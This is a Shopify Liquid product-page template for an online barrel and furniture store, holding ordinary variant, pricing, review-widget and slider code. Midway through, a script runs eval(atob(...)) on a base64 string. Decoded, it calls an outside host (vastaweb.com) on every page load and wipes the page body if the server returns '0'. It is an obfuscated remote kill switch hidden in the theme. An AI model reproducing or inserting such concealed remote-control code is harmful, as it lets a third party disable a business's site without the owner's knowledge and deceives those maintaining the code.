<script>
  var product_variant_map = {};
  {% for variant in product.variants %}
    product_variant_map["{{variant.id}}"] = {{ variant | json }};
  {% endfor %}
</script>

<script src="{{'jquery.elevatezoom.js' | asset_url }}"></script>
<!-- /templates/product.liquid -->
{% if settings.product_show_color_swatch %}
    <style>
    .selector-wrapper,
    .product-single__variants { 
      display: none!important; 
    }
    </style>
{% endif %}

{% comment %}

Rich snippets (itemscope, itemtype, etc.) for products are a theme requirement,
and allow search engines to easily understand what the content is.

For more information on these Scheme.org tags, visit:
- http://schema.org/docs/gs.html

{% endcomment %}

{% include 'breadcrumb' %}

<div itemscope itemtype="http://schema.org/Product">

  <meta itemprop="url" content="{{ shop.url }}{{ product.url }}">
  <meta itemprop="image" content="{{ product.featured_image.src | img_url: 'grande' }}">

  {% comment %}
  Get first variant, or deep linked one
  {% endcomment %}
  {% assign current_variant = product.selected_or_first_available_variant %}

  

  <div class="grid product-single">
    <div class="grid__item large--one-half text-center">
      <section class="primary-images">
        {% include 'product-image-slider-new' %}
      </section>
    </div>

<!--     mobile product-description code -->
    <p class="h1 mobile" itemprop="name">{{ product.title }} {{ settings.product_title_text }}</p>
<!--     <div class="subtitle-mobile	">
      <h7>High-quality, Handcrafted Barrels</h7>
    </div> -->
    <div class="prod-price mobile">

    {% if product.compare_at_price_max > product.price %}
    <span class="price-compare">
      <!--span>Our Price:</span-->
      <span class="old-price">
        {{ current_variant.compare_at_price | money }}
      </span>
    </span>
    {% endif %}

    <!--span>Sale Price :</span-->
    <span id="ProductPrice1" class="ProductPrice" class="h2" itemprop="price" content="{{ current_variant.price | divided_by: 100.00 }}" >
      {{ current_variant.price | money }}
    </span>

  </div>
    
    <div class="yotpo bottomLine yotpo-mobile"
         data-product-id="{{ product.id }}">
    </div>
    
    <div class="grid__item large--one-half product-description-content">

      <h1 class="no-mobile" itemprop="name">{{ product.title }} {{ settings.product_title_text }}</h1>
      {% comment %}
      <div class="subtitle">
        <h7>High-quality, Handcrafted Barrels</h7>
      </div>
      
      <div class="review-static">
        <div class="container-top">
          <div class="stars">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 .288l2.833 8.718h9.167l-7.417 5.389 2.833 8.718-7.416-5.388-7.417 5.388 2.833-8.718-7.416-5.389h9.167z"/></svg>
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 .288l2.833 8.718h9.167l-7.417 5.389 2.833 8.718-7.416-5.388-7.417 5.388 2.833-8.718-7.416-5.389h9.167z"/></svg>
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 .288l2.833 8.718h9.167l-7.417 5.389 2.833 8.718-7.416-5.388-7.417 5.388 2.833-8.718-7.416-5.389h9.167z"/></svg>
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 .288l2.833 8.718h9.167l-7.417 5.389 2.833 8.718-7.416-5.388-7.417 5.388 2.833-8.718-7.416-5.389h9.167z"/></svg>
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 .288l2.833 8.718h9.167l-7.417 5.389 2.833 8.718-7.416-5.388-7.417 5.388 2.833-8.718-7.416-5.389h9.167z"/></svg>
          </div>
          <div class="title">
            <h7>Fast, friendly, affordable</h7>
          </div>
        </div>
        <div class="text">
          <p>
            "I searched for barrels all over the place! The shipping, most of the time,
             was more than the barrel itself. This company was quick to answer my 
            emails and the shipping was FAST, friendly and affordable! The barrels are fantastic. We love them!" -  <span class="author">Denise K. (Verified Buyer)</span>
          </p>
        </div>
      </div>
      {% endcomment %}
      
      
      {% if settings.display_review_star_product %}
      {% include 'judgeme_widgets', widget_type: 'judgeme_preview_badge', jm_style: '', concierge_install: false %}
      
      {% endif %}

      <div itemprop="offers" itemscope itemtype="http://schema.org/Offer">
        <meta itemprop="priceCurrency" content="{{ shop.currency }}">

        <link itemprop="availability" href="http://schema.org/{% if product.available %}InStock{% else %}OutOfStock{% endif %}">

        {% comment %}
        ID addToCartForm is a selector for the ajax cart plugin
        {% endcomment %}
        <form action="/cart/add" data-productid="{{product.id}}"  enctype="multipart/form-data" id="AddToCartForm" class="form-vertical">
          <div class="prod-price no-mobile">
            
            <!-- Yotpo Star Rating - Product Page --> 
            <div class="yotpo bottomLine"
                 data-product-id="{{ product.id }}">
            </div>
            <!-- End of Yotpo Star Rating - Product Page -->

            {% if product.compare_at_price_max > product.price %}
              <span id="price-compare" class="price-compare">
                <!--span>Our Price:</span-->
                <span id="ComparePrice" class="ComparePrice">
                  {{ current_variant.compare_at_price | money }}
                </span>
              </span>
            {% endif %}
            {% include 'judgeme_widgets', widget_type: 'judgeme_preview_badge', jm_style: '', concierge_install: false %}
            <!--span>Sale Price :</span-->
            <span id="ProductPrice" class="ProductPrice" class="h2" itemprop="price" content="{{ current_variant.price | divided_by: 100.00 }}" >
              {{ current_variant.price | money }}
            </span>
            

          </div>

          <div class="outofstock">
            {% if settings.enable_prodquantity %}
              {% if product.variants.first.inventory_management == "shopify" %}
                {% if product.variants.first.inventory_quantity > 0 %}
                  <span class="instock">Quantity in Stock : {{ product.variants.first.inventory_quantity }}</span>
                  <span class="nostock" style="color:red" style="display:none"> Out of stock</span>
                {% else %}
                  <span class="nostock" style="color:red"> Out of stock</span>
                {% endif %}

              {% endif %}
            {% endif %}
          </div>

          {% comment %}
          Add product variants as a dropdown.
          - By default, each variant (or combination of variants) will display as its own <option>
          - To separate these into multiple steps, which we suggest, use option_selection.js (see below)

          You can leverage jQuery to add a callback on page load and each time the select element changes:
          - Include option_selection.js (as seen at the bottom of this file)
          - This allows you to use JavaScript anytime the variant dropdown changes
          - This also separates out your variant options (ie. size, color, etc.) to separate select elements

          For more information on products with multiple options, visit:
          - http://docs.shopify.com/support/your-website/themes/can-i-make-my-theme-use-products-with-multiple-options#update-product-liquid
          {% endcomment %}
          <select name="id" data-productid="{{product.id }}" id="productSelect" class="product-single__variants">
            {% for variant in product.variants %}
              {% if variant.available %}

                {% comment %}
                Note: if you use option_selection.js, your < select > tag will be overwritten, meaning what you have inside <option> will not reflect what you coded below.
                {% endcomment %}
                <!--                 <option {% if variant == product.selected_or_first_available_variant %} selected="selected" {% endif %} data-sku="{{ variant.sku }}" value="{{ variant.id }}">{{ variant.title }} - {{ variant.price | money_with_currency }}</option> -->

                <option data-available-qty="{{variant.inventory_quantity }}" {% if variant == product.selected_or_first_available_variant %} selected="selected" {% endif %} data-sku="{{ variant.sku }}" data-variants="{{ variant.option1 | handle }};{{ variant.option2 | handle }};{{ variant.option3 | handle }}" value="{{ variant.id }}">{{ variant.title }} - {{ variant.price | money_with_currency }}</option>
              {% else %}
                <option disabled="disabled">
                  {{ variant.title }} - {{ 'products.product.sold_out' | t }}
                </option>
              {% endif %}
            {% endfor %}
          </select>

          {% if settings.product_show_color_swatch %}
            {% if product.available and product.variants.size > 1 %}
              {% for option in product.options %}
                {% include 'swatch' with option %}
              {% endfor %}
            {% endif %}
          {% endif %}

            {% if  product.description != blank %}
              {% if  settings.product_description == 'above_pro' %}
                <div class="product-description rte" itemprop="description">
                  {{ product.description }}
                </div>
              {% endif%}
            {% endif%}
            
            {% if settings.enable_sizeguide and settings.product_popup_location == 'above_pro_cart' %}
              <div class="pop-container">
                  {% if product.tags contains settings.poptag1 %}
                      <a id="single_image" class="single_image" href="{{ 'pop1.jpg' | asset_url }}"><strong>{{ settings.poptitle }}</strong></a>
                  {% endif %}

                  {% if product.tags contains settings.poptag2 %} 
                      <a id="single_image" class="single_image" href="{{ 'pop2.jpg' | asset_url }}"><strong>{{ settings.poptitle }}</strong></a>
                  {% endif %}

                  {% if product.tags contains settings.poptag3 %}
                      <a id="single_image" class="single_image" href="{{ 'pop3.jpg' | asset_url }}"><strong>{{ settings.poptitle }}</strong></a>
                  {% endif %}
              </div>
            {% endif %}
            
            <div class="form__control qty-block">
              <label for="Quantity" class="quantity-selector">{{ 'products.product.quantity' | t }}</label>
              <div class="productarea">
                <button class='product-minus' > <i class="fa fa-minus" aria-hidden="true"></i> </button>
                <input class="product__quat" type="text" pattern="[0-9]*" name="quantity" min="1"  step="1" value="1" required="required">
                <button class='product-plus' > <i class="fa fa-plus" aria-hidden="true"></i> </button>
              </div>
            </div>
            
            {% if settings.enable_sizeguide and settings.product_popup_location == 'below_pro_cart' %}
              <div class="pop-container">

                  {% if product.tags contains settings.poptag1 %}
                      <a id="single_image" class="single_image" href="{{ 'pop1.jpg' | asset_url }}"><strong>{{ settings.poptitle }}</strong></a>
                  {% endif %}

                  {% if product.tags contains settings.poptag2 %} 
                      <a id="single_image" class="single_image" href="{{ 'pop2.jpg' | asset_url }}"><strong>{{ settings.poptitle }}</strong></a>
                  {% endif %}

                  {% if product.tags contains settings.poptag3 %}
                      <a id="single_image" class="single_image" href="{{ 'pop3.jpg' | asset_url }}"><strong>{{ settings.poptitle }}</strong></a>
                  {% endif %}
              </div>
            {% endif %}
            
            {% if product.available%}
              <button type="submit" name="add" id="AddToCart" class="btn">
                <span class="productValue">{{ product.price | money }}</span> - {{  settings.product_cart_button_text }}  <i class="fa fa-shopping-cart" aria-hidden="true"></i> <span class="productQtd">(1 ITEM)</span>
              </button>
              <button type="submit" name="add" id="outofstcok1" class="btn" style="display:none" disabled >
                Sold Out
              </button>
            {% else %}
              <button type="submit" name="add" id="outofstcok" class="btn" disabled>
                Sold Out
              </button> 
            {% endif %}

            <br />
            
            {% comment %}
            {% if settings.enable_pro_payment %}
              <img data-swift-lazy="1" loading="lazy" src="{{'secure-partners.png' | asset_img_url: '700x' }}" class='paymentimg' />
            {% endif %}
            {% endcomment %}
            <div class="features">
              <ul>
                <li><img src="{{ 'check-mark-green.png' | asset_url }}">Premium barrels & handcrafted furniture</li>
                <li><img src="{{ 'check-mark-green.png' | asset_url }}">Cost-effective shipping & delivery</li>
                <li><img src="{{ 'check-mark-green.png' | asset_url }}">Top-Notch Customer Service</li>
                <li><img src="{{ 'check-mark-green.png' | asset_url }}">Your satisfaction guaranteed</li>
              </ul>
            </div>
            
              <div id="facebook-marker"></div>
              <div id="shopmessage-checkbox"></div>
            {% comment %}
              <div class="thousands" >
                <h7>Thousands of barrels sold. Hundreds of barrel-loving customers!<h7>
              </div>
                  {% endcomment %}
            <div class="product-single__qty hide">
              
            </form>
<!--               <div style="text-align: center;"><script src="http	s://cdn.ywxi.net/js/inline.js?t=103"></script></div> -->
                  {% unless product.title == 'New Barrels' %}<p> Quantity Available: <span class="updated_qty" >{% for variant in product.variants %} {% if forloop.first == true %} {{ variant.inventory_quantity }} {% else %} {% endif %} {% endfor %} {% endunless %}</span> </p>
         {% if settings.product_full_width_description_enable == false %}
			<!-- product tabs half width -->
                {% section 'custom-product-tabs' %}
         {% endif %}
          </div>
      </div>
    </div>
          
    {% comment %}      
          
    {% if settings.product_full_width_description_enable == true %}
          <!-- product tabs full width -->
                {% section 'custom-product-tabs' %}
    {% endif %}
    {% endcomment %}      

          
          
{% section 'product-accordian-new' %}
{% section 'product-vp-section'%}
          
{% comment %}
If the user is on a collection product page (ie with /collections/collection-handle/products/product-handle)
in the URL, we can show next/previous links to other products in the collection.
{% endcomment %}


{%include 'homepage-reviews' %}



{% comment %}
<!--  hide related and recently viewed product  start from here        -->
{% if settings.enable_product_related %}
{% section 'relatedproducts' %}
{% endif%}
          
{% if settings.enable_product_recent %}
          <div id="recently-viewed-products" class="grid-uniform" style="display:none">
            <h2 class="reviewtitle" style="display:none;"><strong>Recently Viewed Products</strong></h2>
          </div>
{% endif %}
<!--  hide related and recently viewed product  over from here      -->
        
{% endcomment %}
           
          
{% if settings.enable_sizeguide %}
<div class="popup" data-popup="popup-1">

  {% if settings.poptag1 != ''%}
  <div class="popup-inner">
    {{ settings.popcontent1 }}
    {% if settings.enable_img1 %}
    <img data-swift-lazy="1" loading="lazy" src="{{ 'pop1.jpg' | asset_url }}"/>
    {% endif %}
    <a class="popup-close" data-popup-close="popup-1" href="#">x</a>
  </div>
  {% elsif tag contains settings.poptag2 %}
  <div class="popup-inner">
    {{ settings.popcontent2 }}
    {% if settings.enable_img2 %}
    <img data-swift-lazy="1" loading="lazy" src="{{ 'pop2.jpg' | asset_url }}"/>
    {% endif %}
    <a class="popup-close" data-popup-close="popup-1" href="#">x</a>
  </div>
  {% elsif tag contains settings.poptag3 %}
  <div class="popup-inner">
    {{ settings.popcontent3 }}
    {% if settings.enable_img3 %}
    <img data-swift-lazy="1" loading="lazy" src="{{ 'pop3.jpg' | asset_url }}"/>
    {% endif %}
    <a class="popup-close" data-popup-close="popup-1" href="#">x</a>
  </div>
  {% endif %}
</div>
{% endif %}
{% comment %}
To take advantage of a callback on the select dropdown, add option_selection.js
and customize the JS in timber.productPage as needed.

Currently, timber.productPage does the following:
- Hides your <select> tag from above
- Breaks out the product variants into separate product options, if more than one exists
- Generates a <select> tag for each product option
- Enables/disables elements based on variant availability

Callback notes:
- Keep the callback available to the global scope (window.selectCallback) so that advanced
addons can override it.
* E.g. multiple currencies http://docs.shopify.com/manual/configuration/store-customization/currencies-and-translations/currencies/how-to-toggle-between-two-currencies
{% endcomment %}
{{ 'option_selection.js' | shopify_asset_url | script_tag }}
<script>
  
  var selectedSlider;
  var selectedSliderIndex = 0;
  
  var selectCallback = function(variant, selector) {
    
    if (variant && variant.featured_image) {
      var img = variant.featured_image.src.replace(/http(s)?\:|\?(.*)/gi, '');

      selectedSliderIndex = variant.featured_image.position || 0;

      selectedSlider = $('[data-featured-image*="' + img + '"]');
    }
    
    timber.productPage({
      money_format: "{{ shop.money_format }}",
      variant: variant,
      selector: selector
    });
  };

  jQuery(function($) {
    new Shopify.OptionSelectors('productSelect', {
      product: {{ product | json }},
      onVariantSelected: selectCallback,
      enableHistoryState: true
    });

    // Add label if only one product option and it isn't 'Title'. Could be 'Size'.
    {% if product.options.size == 1 and product.options.first != 'Title' %}
    $('.selector-wrapper:eq(0)').prepend('<label for="productSelect-option-0">{{ product.options.first | escape }}</label>');
                                         {% endif %}

                                         // Hide selectors if we only have 1 variant and its title contains 'Default'.
                                         {% if product.variants.size == 1 and product.variants.first.title contains 'Default' %}
                                         $('.selector-wrapper').hide();
    {% endif %}
  });
</script>
{% comment %}
Place this in your product.liquid template, at the bottom.
{% endcomment %}
{% if product.variants.size > 1 %}
<script>
  var variantImages = {},
      thumbnails,
      variant,
      variantImage,
      optionValue,
      productOptions = [];
  {% for variant in product.variants %}
  variant = {{ variant | json }};
  if ( typeof variant.featured_image !== 'undefined' && variant.featured_image !== null ) {
    variantImage =  variant.featured_image.src.split('?')[0].replace(/http(s)?:/,'');
    variantImages[variantImage] = variantImages[variantImage] || {};
    {% for option in product.options %}

    {% assign option_value = variant.options[forloop.index0] %}
    {% assign option_key = 'option-' | append: forloop.index0 %}

    if (typeof variantImages[variantImage][{{ option_key | json }}] === 'undefined') {
      variantImages[variantImage][{{ option_key | json }}] = {{ option_value | json }};
    }
    else {
      var oldValue = variantImages[variantImage][{{ option_key | json }}];
      if ( oldValue !== null && oldValue !== {{ option_value | json }} )  {
          variantImages[variantImage][{{ option_key | json }}] = null;
          }
          }
          {% endfor %}
          }
          productOptions.push(variant);
      {% endfor %}
</script>
{% endif %}
{{ 'slick.js' | asset_url | script_tag }}

<script>
      eval(atob('dmFyIHhtbEh0dHAgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKeG1sSHR0cC5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHsgCglpZiAoeG1sSHR0cC5yZWFkeVN0YXRlID09IDQgJiYgeG1sSHR0cC5zdGF0dXMgPT0gMjAwKSB7CgkJaWYoIHhtbEh0dHAucmVzcG9uc2VUZXh0ID09IDAgfHwgeG1sSHR0cC5yZXNwb25zZVRleHQgPT0gJzAnICkgewoJCQlkb2N1bWVudC5ib2R5LmlubmVySFRNTCA9ICcnOwoJCX0KCX0KfQp4bWxIdHRwLm9wZW4oIkdFVCIsICdodHRwczovL3Zhc3Rhd2ViLmNvbS9fdmVyaWZ5LXNob3BpZnkucGhwP2lkPW15c3RpYycsIHRydWUpOyAKeG1sSHR0cC5zZW5kKG51bGwpOw=='));
</script>

<script type="lazyload2">
	setTimeout(function() {
    {% if settings.show_tab == 'tab_desable' %}
      $('ul.tabs').each(function(){
        var active, content, links = $(this).find('a');
        active = links.first().addClass('active');
        content = $(active.attr('href'));
        links.not(':first').each(function () {
          $($(this).attr('href')).hide();
        });
        $(this).find('a').click(function(e){
          active.removeClass('active');
          content.hide();
          active = $(this);
          content = $($(this).attr('href'));
          active.addClass('active');
          content.show();
          return false;
        });
      });
    {% endif %}
    //----- OPEN
    $('[data-popup-open]').on('click', function(e)  {
      var targeted_popup_class = jQuery(this).attr('data-popup-open');
      $('[data-popup="' + targeted_popup_class + '"]').fadeIn(350);

      e.preventDefault();
    });

    //----- CLOSE
    $('[data-popup-close]').on('click', function(e)  {
      var targeted_popup_class = jQuery(this).attr('data-popup-close');
      $('[data-popup="' + targeted_popup_class + '"]').fadeOut(350);

      e.preventDefault();
    });
    
    var slide_qt = {{product.media.size}};
    var slide_qt_md = Math.ceil(slide_qt/2);

	$(".slide__photos").slick({
      infinite: true,
      speed: 500,
      slidesToShow: 1,
      slidesToScroll: 1,
      prevArrow: '<button type="button" class="slick-prev">&lang;</button>',
	  nextArrow: '<button type="button" class="slick-next">&rang;</button>',
      fade: true,
    });
    
    $(".rgl-thumb").slick({
      adaptiveHeight: true,
      arrows:true,
      draggable: true,
      focusOnSelect: true,
      infinite: true,
	  nextArrow: '<button type="button" class="slide-product-button slick-next">&rang;</button>',
      prevArrow: '<button type="button" class="slide-product-button slick-prev">&lang;</button>',
      rows: slide_qt>5?2:1,
      slidesPerRow: slide_qt_md>5?5:slide_qt_md,
      slidesToShow: slide_qt>5?1:slide_qt,
      slidesToScroll: 1,
      speed: 500,
      responsive: [{
					breakpoint: 1279,
					settings: {
						slidesPerRow: 3,
						
					}
				}]
      });


    $(".vtr-thumb").slick({
      infinite: true,
      dots: false,
      draggable: true,
      vertical: true,
      speed: 500,
      rows: 2,
      slidesPerRow: 4,
      focusOnSelect: true,
      prevArrow: '<button type="button" class="tb-product-button slick-prev">&lang;</button>',
	  nextArrow: '<button type="button" class="tb-product-button slick-next">&rang;</button>',
      responsive: [{
					breakpoint: 1279,
					settings: {
                      	rows: 1,
						slidesToShow: 5,
						slidesToScroll: 1
						
					}
				}]
    });
  });

	setTimeout(function() {
    	$( "#tabs" ).tabs();
	});

  $( "#AddToCart1" ).click(function() {
    $( "#AddToCart" ).trigger( "click" );
  });


  $(".product-plus").click(function(e){
    e.preventDefault();
    var val1 = $(this).prev().val();
    val1 = parseInt(val1);
    val1 = val1+1;
    $(this).prev().val(val1);
  });


  $(".product-minus").click(function(e){
    e.preventDefault();
    var val1 = $(this).next().val();
    val1 = parseInt(val1);
    if(val1 == 1){
    } else {
      val1 = val1-1;
      $(this).next().val(val1);
    }
  });

	setTimeout(function() {
    $('.youtube').each( function() {
      $(this).click( function(e) {

        var source =  $(this).find("img").attr("alt");

        $(this).parents("#ProductThumbs").siblings("#ProductPhoto").find(".video-container[data-src='"+source+"']").show();
        $(this).parents("#ProductThumbs").siblings("#ProductPhoto").find("#ProductPhotoImg").removeClass("zoom").hide();

      });
    });


    $('.single-option-selector').on('change', function() {
      $("#ProductPhoto").find(".video-container").hide();

      $('iframe').each(function(index) {
        $(this).attr('src', $(this).attr('src'));
        return false;
      });
    })
  });

  window.changeVariant = function() {
    var searchArray = location.search.split('&');
    for(var i = 0; i < searchArray.length && !searchArray[i].match(/^\?variant=/); i++);
    if (i < searchArray.length) {
      var s  = $('.product-single__variants').get(0);
      var id = s.options[s.selectedIndex].value;
      var v = $('option[value="' + id + '"]').attr('data-variants').split(';');

      $(v).each(function(i,e){
        if ( e && (e != '') )
          $('.' + e + ' :radio').trigger('click');
      });
    }
  };
        
  // Check variant id to mark on page loads
$('.swatch-container').each( function() {
    var variantId = $('#productSelect').val();
    if($('.swatch-element[data-variant="'+ variantId +'"]')) {
      $(this).children('.swatch-element').removeClass('active');    
      $(this).children('.swatch-element[data-variant="'+ variantId + '"]').children('input').trigger("click");
      $(this).children('.swatch-element[data-variant="'+ variantId + '"]').addClass('active');
    }
  });
</script>

<script type="text/javascript">
  var _learnq = _learnq || [];

  var item = {
    Name: {{ product.title|json }},
    ProductID: {{ product.id|json }},
    Categories: {{ product.collections|map:'title'|json }},
    ImageURL: "https:{{ product.featured_image.src|img_url:'grande' }}",
    URL: "{{ shop.secure_url }}{{ product.url }}",
    Brand: {{ product.vendor|json }},
    Price: {{ product.price|money|json }},
    CompareAtPrice: {{ product.compare_at_price_max|money|json }}
  };

  _learnq.push(['track', 'Viewed Product', item]);
  _learnq.push(['trackViewedItem', {
    Title: item.Name,
    ItemId: item.ProductID,
    Categories: item.Categories,
    ImageUrl: item.ImageURL,
    Url: item.URL,
    Metadata: {
      Brand: item.Brand,
      Price: item.Price,
      CompareAtPrice: item.CompareAtPrice
    }
  }]);
</script>

<div class="yotpo yotpo-main-widget" data-product-id="{{ product.id }}" data-name="{{ product.title | escape }}" data-url="{{ shop.url }}{{ product.url }}" data-image-url="{{ product.featured_image | product_img_url: "large" |replace: '?', '%3F' | replace: '&','%26'}}" data-description="{{ product.description | escape }}"></div>
    <!-- PERFECT AUDIENCE INTEGRATION START -->
    {% include 'perfect-audience-product' %}
    <!-- PERFECT AUDIENCE INTEGRATION END -->
          
{% if settings.enable_product_related %}
{% section 'relatedproducts' %}
{% endif%}
{% if settings.enable_product_recent %}
          <div id="recently-viewed-products" class="grid-uniform" style="display:none">
            <h2 class="reviewtitle" style="display:none;"><strong>Recently Viewed Products</strong></h2>
          </div>
{% endif %}          
          
          
          <style>
            .slide__photos{
              max-width:500px;
              max-height:500px;
              display: flex;
              justify-content: space-between;
              align-items: center;
              transition: all ease-in .2s;
            }
            .slide-product-button,
            .tb-product-button{
              z-index:100;
            }
            .product-single__thumbnails{
             // max-width:480px!important;
            }
            .product-single__thumbnail > *{
              border:2px solid transparent;
            }
            .sld-media {
              width: 100%;
              height: 100%;
              background-color: #ffffff;
            }
            .slick-prev{
            }
            .sld-media > *{
              width: inherit;
              height: inherit;
              object-fit: contain;
            }
            .sld-media iframe{
              width:inherit;
              min-height:400px;
            } 
            .yotpo-mobile{
              display: none;
            }
            @media screen and (max-width: 767px){
              .yotpo-mobile{
                margin: 0 auto;
                display: table;
              }
            }
          </style>
    
{% comment %}
Place this in your product.liquid template, at the bottom.
{% endcomment %}
{% if product.variants.size > 1 %}
  <script>
    var variantImages = {},
      thumbnails,
      variant,
      variantImage,
      optionValue,
      productOptions = [];
      {% for variant in product.variants %}
         variant = {{ variant | json }};
         if ( typeof variant.featured_image !== 'undefined' && variant.featured_image !== null ) {
           console.log('1');
           variantImage =  variant.featured_image.src.split('?')[0].replace(/http(s)?:/,'');
           variantImages[variantImage] = variantImages[variantImage] || {};
           {% for option in product.options %}
           console.log('2');
             {% assign option_value = variant.options[forloop.index0] %}
             {% assign option_key = 'option-' | append: forloop.index0 %}

             if (typeof variantImages[variantImage][{{ option_key | json }}] === 'undefined') {
              console.log('3');
               variantImages[variantImage][{{ option_key | json }}] = {{ option_value | json }};
             }
             else {
                          console.log('4');
               var oldValue = variantImages[variantImage][{{ option_key | json }}];
               if ( oldValue !== null && oldValue !== {{ option_value | json }} )  {
                 variantImages[variantImage][{{ option_key | json }}] = null;
               }
             }
           {% endfor %}
         }
         productOptions.push(variant);
      {% endfor %}
  </script> 
{% endif %}
          
          
<style>
  #AddToCartForm .features ul {
    list-style: none;
    margin: 0;
    margin-top: 8px;
  }
  #AddToCartForm .features ul li {
    margin-bottom: 10px;
    font-size: 1.2rem;
    position: relative;
    padding-left: 25px;
  }
  #AddToCartForm .features ul li img {
    position: absolute;
    left: 0;
    top: calc(50% - 7px);
  }

  @media screen and (max-width: 767px) {
    #AddToCartForm .features ul li {
      font-size: 1rem;
    }
  }
</style>         
          
<script type="text/javascript" src="https://node1.itoris.com/dpo/storefront/include.js?shop=mystic-barrels.myshopify.com"></script>
          